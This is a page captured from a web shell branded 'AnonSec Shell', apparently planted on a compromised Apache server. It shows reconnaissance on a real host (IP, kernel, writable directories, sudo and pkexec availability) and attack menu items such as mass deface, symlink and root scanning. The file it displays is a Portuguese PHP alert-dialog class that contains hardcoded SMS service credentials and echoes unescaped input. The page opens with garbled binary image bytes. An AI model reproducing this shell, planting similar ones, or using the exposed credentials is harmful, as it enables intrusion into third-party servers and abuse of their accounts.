JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/siac/cnsmaracanau/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/siac/cnsmaracanau/aviso.php
<link href="components/bootstrap/dist/css/bootstrap.css" rel="stylesheet" type="text/css"/>
<link href="components/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>

<?php
    /**
     * Created by PhpStorm.
     * User: Joelton Maia
     * Date: 25/02/2016
     * Time: 15:59
     */
    ini_set('display_errors', 'off');
    
    class aviso
    {
        public function avisoErro($caminho, $mensagem, $titulo)
        { ?>

            <!--        <meta http-equiv="refresh" content="6; --><?php //echo $caminho;
            ?><!--">-->

            <div class="modal-content" style="width: 80%; position: relative; left: 10%; top: 20%;">
                <div class="modal-header" style="background-color:  #d9534f; color:  aliceblue;">
                    <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                    <h4 class="modal-title" id="myModalLabel">
                        <!--                        <i aling='center' class='fa fa-balance-scale  fa-1x' title='Voltar'></i>-->
                        <?php echo $titulo; ?>
                    </h4>
                </div>
                <div class="modal-body" style="font-size: 15px; font-family: Verdana;">
                    <?php echo $mensagem; ?>
                </div>
                <div class="modal-footer">
                    <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                    <a href="<?php echo $caminho; ?>">
                        <i aling='center' class='fa fa-check-square-o fa-3x' style="color: darkred;" title='Voltar'></i>
                    </a>
                </div>
            </div>
            <?php
            
        }
        
        
        public function avisoSucesso($caminho, $mensagem, $titulo)
        { ?>
            <meta http-equiv="refresh" content="3; <?php echo $caminho; ?>">
            <style>
                .modal {
                    font-family: 'AlegreyaSansSC-Regular';
                    background-color: #ecf0f5;
                }

                .close {
                    color: white;
                    opacity: 1;
                }

                .close:hover {
                    color: white;
                    opacity: 1;
                    cursor: inherit;
                }

            </style>
            <div class="box box-body box-success" style="background: #ecf0f5; color:#000000">
                <div class="modal-dialog box-body">
                    <div class="modal-content">
                        <div class="modal-header" style="background: #605CA8; color:#000000">
                            <i class=" close fa fa-check-square-o fa-3x" style="color: black;"></i>
                            <h3 class="modal-title" id="myModalLabel"><?php echo $titulo; ?></h3>
                        </div>
                        <div class="modal-body text-center text-bold" style="background: rgba(0,191,89,0.31);color:#004b25">
                            <h2><?php echo $mensagem; ?></h2>
                        </div>
                        <div class="modal-footer" style="background: rgba(60,141,188,0.55);color:black">
                            <div class="text-center">
                                <h3>Aguarde... <i class="fa fa-spinner fa-pulse fa-fw"></i></h3>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <?php
        }
        
        public function avisoLogin($caminho, $mensagem, $titulo)
        { ?>
            <meta http-equiv="refresh" content="3; <?php echo $caminho; ?>">
            <style>
                .modal {
                    font-family: 'Roboto';
                    background-color: #ffffff;
                }

                .close {
                    color: #ffffff;
                    opacity: 1;
                }

                .close:hover {
                    color: #ffffff;
                    opacity: 1;
                    cursor: inherit;
                }

            </style>
            <div class="box box-body box-success" style="background:#ffffff; color:#000000;">
                <div class="modal-dialog box-body">
                    <div class="modal-content">
                        <div class="modal-header" style="background: #605CA8; color:#000000">
                            <i class=" close fa fa-check-square-o fa-3x" style="color: black;"></i>
                            <h3 class="modal-title" id="myModalLabel"><?php echo $titulo; ?></h3>
                        </div>
                        <div class="modal-body text-center text-bold" style="background: rgba(236,240,245,0.31);color:#004b25">
                            <h2><?php echo $mensagem; ?></h2>
                        </div>
                        <div class="modal-footer" style="background: rgba(60,141,188,0.55);color:black">
                            <div class="text-center">
                                <h3>Aguarde... <i class="fa fa-spinner fa-pulse fa-fw"></i></h3>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <?php
        }
        
        public function avisoClose($mensagem)
        { ?>
            <?php
            ?>
            <div class="modal-content" style="width: 100%; height: 100%; position: relative;  background-color: rgba(0, 137, 114, 0.23);">
                <div class="modal-header" style="background-color:   #605CA8; color:  aliceblue;">
                    <h4 class="modal-title" id="myModalLabel"><i class="fa fa-balance-scale"></i>WEBJURI&nbsp;|&nbsp;ATENÇÃO</h4>
                </div>
                <div class="modal-body" style="font-size: 20px; top: 30%; text-align: center; height: 50%; font-family: Verdana;">
                    <?php echo $mensagem; ?>
                </div>
            </div>
            <?php
        }
        
        public function avisoCloseErro($mensagem)
        { ?>
            <?php
            ?>
            <div class="modal-content" style="width: 100%; height: 100%; position: relative;  background-color: rgba(123, 31, 16, 0.23);">
                <div class="modal-header" style="background-color:   #7b1f10; color:  aliceblue;">
                    <h4 class="modal-title" id="myModalLabel"><i class="fa fa-balance-scale"></i>WEBJURI&nbsp;|&nbsp;ATENÇÃO</h4>
                </div>
                <div class="modal-body" style="font-size: 20px; top: 30%; text-align: center; height: 50%; font-family: Verdana;">
                    <?php echo $mensagem; ?>
                </div>
            </div>
            <?php
        }
        
        public function avisoExcluir($caminho_retorno, $mensagem, $titulo, $caminho_exclusao)
        { ?>
            <?php
            if (!$_POST['valor']) {
                ?>
                <div class='container panel-body'>
                    <meta http-equiv="refresh" content="12; <?php echo $caminho_retorno; ?>">
                    <form action="<?php echo $caminho_exclusao ?>" method="post">
                        <div class="modal-content" style="width: 40%; position: relative; left: 25%; top: 50%;">
                            <div class="modal-header" style="background-color:  #d9534f; color:  aliceblue;">
                                <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                                <h4 class="modal-title " id="myModalLabel"><?php echo $titulo; ?></h4>
                            </div>
                            <div class="modal-body">
                                <?php echo $mensagem; ?>
                            </div>
                            <div class="modal-footer">
                                <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                                <a href="<?php echo $caminho_exclusao; ?>">
                                    <button type="submit" class="btn btn-danger" autofocus="">OK</button>
                                </a>
                                <a href="<?php echo $caminho_retorno; ?>">
                                    <button type="button" class="btn btn-default" autofocus="">Cancelar</button>
                                </a>
                            </div>
                        </div>

                        <input type="hidden" name="valor" value="1">
                </div>
                </form>
                
                
                <?php
                exit();
            } else { ?>
                <div class='container panel-body'>
                    <meta http-equiv="refresh" content="2; <?php echo $caminho_retorno; ?>">
                    <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 20%;">
                        <div class="modal-header" style="background-color:  #3a7132; color:  aliceblue;">
                            <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                            <h4 class="modal-title" id="myModalLabel">Exclusão de registro!</h4>
                        </div>
                        <div class="modal-body">
                            Registro excluído com sucesso!
                        </div>
                        <div class="modal-footer">
                            <h3>Aguarde... <i class="fa fa-spinner fa-pulse fa-fw"></i></h3>
                        </div>
                    </div>
                </div>
            
            <? }
            
        }
        
        public function avisoConfirma($caminho_retorno, $mensagem, $titulo, $caminho_exclusao)
        { ?>
            <?php
            if (!$_POST['valor']) {
                ?>
                <div class='container panel-body'>
                    <meta http-equiv="refresh" content="12; <?php echo $caminho_retorno; ?>">
                    <form action="<?php echo $caminho_exclusao ?>" method="post">
                        <div class="modal-content" style="width: 40%; position: relative; left: 25%; top: 50%;">
                            <div class="modal-header" style="background-color:  #cc661a; color:  aliceblue;">
                                <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                                <h4 class="modal-title " id="myModalLabel"><?php echo $titulo; ?></h4>
                            </div>
                            <div class="modal-body">
                                <?php echo $mensagem; ?>
                            </div>
                            <div class="modal-footer">
                                <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                                <a href="<?php echo $caminho_exclusao; ?>">
                                    <button type="submit" class="btn btn-default" autofocus="">OK</button>
                                </a>
                                <a href="<?php echo $caminho_retorno; ?>">
                                    <button type="button" class="btn btn-default" autofocus="">Cancelar</button>
                                </a>
                            </div>
                        </div>

                        <input type="hidden" name="valor" value="1">
                </div>
                </form>
                
                
                <?php
                exit();
            } else { ?>

                <div class='panel-body'>
                    <meta http-equiv="refresh" content="2; <?php echo $caminho_retorno; ?>">
                    <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 20%;">
                        <div class="modal-header" style="background-color:  #3a7132; color:  aliceblue;">
                            <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                            <h4 class="modal-title" id="myModalLabel">Confirmação!</h4>
                        </div>
                        <div class="modal-body">
                            Operação realizada com sucesso!
                        </div>
                        <div class="modal-footer">
                            <h3>Aguarde... <i class="fa fa-spinner fa-pulse fa-fw"></i></h3>
                        </div>
                    </div>
                </div>
            
            <? }
            
        }
        
        public function avisoModal()
        { ?>
            <script type="text/javascript">
                function abrirAviso(mensagem, titulo) {
                    $('#botao').click();
                    $('#titlemsn').html(titulo);
                    $('#mensagemmsn').html(mensagem);
                }
            </script>
            <button id="botao" type="button" style="display: none;" class="btn btn-primary" data-toggle="modal" data-target="#alerta">
                botão
            </button>
            <!-- Modal -->
            <div style="top:5%;" class="modal fade" id="alerta" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
                <div class="modal-dialog" role="document">
                    <div class="modal-content">
                        <div class="modal-header" style="background: rgba(255, 0, 0, 0.3);">
                            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                            <img src="logo/logo_marcelo.png" width="160px"/>
                            <h4 class="modal-title panel-body texto_centro" style="font-size:25px;color:rgba(147, 22, 22, 0.9);" id="titlemsn"></h4>
                        </div>
                        <div class="modal-body" style="background: rgba(147, 22, 22, 0.9);">
                            <div class="panel-body" id="mensagemmsn" style="color:yellow;text-transform: uppercase;"></div>
                        </div>
                        <div class="modal-footer" style="background: rgba(255, 0, 0, 0.3);">
                            <img src="img/logogt.png" width="60px" style="float: left;clear: both;"/>
                            <button type="button" class="btn btn-danger" data-dismiss="modal">OK</button>
                        </div>
                    </div>
                </div>
            </div>
            <?php
        }
        
        public function avisoArquivar($caminho_retorno, $mensagem, $titulo, $caminho_exclusao)
        { ?>
            <?php
            if (!$_POST['valor']) {
                ?>
                <meta http-equiv="refresh" content="12; <?php echo $caminho_retorno; ?>">
                <form action="<?php echo $caminho_exclusao ?>" method="post">
                    <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 40%;">
                        <div class="modal-header" style="background-color:  #d9534f; color:  aliceblue;">
                            <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                            <h4 class="modal-title " id="myModalLabel"><?php echo $titulo; ?></h4>
                        </div>
                        <div class="modal-body">
                            <?php echo $mensagem; ?>
                        </div>
                        <div class="modal-footer">
                            <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                            <a href="<?php echo $caminho_exclusao; ?>">
                                <button type="submit" class="btn btn-danger" autofocus="">Arquivar</button>
                            </a>
                            <a href="<?php echo $caminho_retorno; ?>">
                                <button type="button" class="btn btn-default" autofocus="">Cancelar</button>
                            </a>
                        </div>
                    </div>

                    <input type="hidden" name="valor" value="1">
                </form>
                <?php
                exit();
            } else { ?>
                <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 20%;">
                    <div class="modal-header" style="background-color:  #3a7132; color:  aliceblue;">
                        <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                        <h4 class="modal-title" id="myModalLabel">Arquivo</h4>
                    </div>
                    <div class="modal-body">
                        Processo movimentado com sucesso!
                    </div>
                    <div class="modal-footer">
                        <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                        <a href="<?php echo $caminho_retorno; ?>">
                            <button type="submit" class="btn btn-success" autofocus="">OK</button>
                        </a>
                    </div>
                </div>
            
            <? }
            
        }
        
        public function AlertaAviso($mensagem)
        { ?>
            <?php ?>
            <div class="alert alert-warning text-center" role="alert">
                <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <strong><?php echo $mensagem; ?></strong>
            </div>
            <?php
        }
        
        public function AlertaErro($mensagem)
        { ?>
            <?php ?>
            <div class="alert alert-error text-center" role="alert">
                <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <strong><?php echo $mensagem; ?></strong>
            </div>
            <?php
        }
        
        public function AlertaOk($mensagem)
        { ?>
            <?php ?>
            <div class="alert alert-success text-center" role="alert">
                <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
                <strong><?php echo $mensagem; ?></strong>
            </div>
            <?php
        }
        
        
        private $SMS_SENDER    = 'Sample';
        private $RESPONSE_TYPE = 'json';
        private $SMS_USERNAME  = 'GTCONTROL';
        private $SMS_PASSWORD  = 'jklsr0xx';
        
        
//        public function enviosms($telefone, $mensagem)
//        {
//
////        return $telefone." ".$mensagem;
//            $to     = $telefone;
//            $mesage = $mensagem;
//
//            $post_array_string = '';
//            $ch                = curl_init();
//            curl_setopt($ch, CURLOPT_HEADER, 0);
//            curl_setopt($ch, CURLOPT_VERBOSE, 0);
//            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
//            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible;)");
//            curl_setopt($ch, CURLOPT_POST, true);
//            curl_setopt($ch, CURLOPT_URL, 'webservices2.twwwireless.com.br/reluzcap/wsreluzcap.asmx/EnviaSMS');
//            $post_array = array(
//                'NumUsu'   => $this->SMS_USERNAME,
//                'Senha'    => $this->SMS_PASSWORD,
//                'Mensagem' => $mesage,
//                'SeuNum'   => $this->SMS_SENDER,
//                'Celular'  => $to
//            );
//
////url-ify the data
//            foreach ($post_array as $key => $value) {
//                $post_array_string .= $key . '=' . $value . '&';
//            }
//            $post_array_string = rtrim($post_array_string, '&');
////set the url, number of POST vars, POST data
//            curl_setopt($ch, CURLOPT_POST, count($post_array));
//            curl_setopt($ch, CURLOPT_POSTFIELDS, $post_array_string);
//            return $response = curl_exec($ch);
//
//        }
        
    }


?>


Anon7 - 2022
AnonSec Team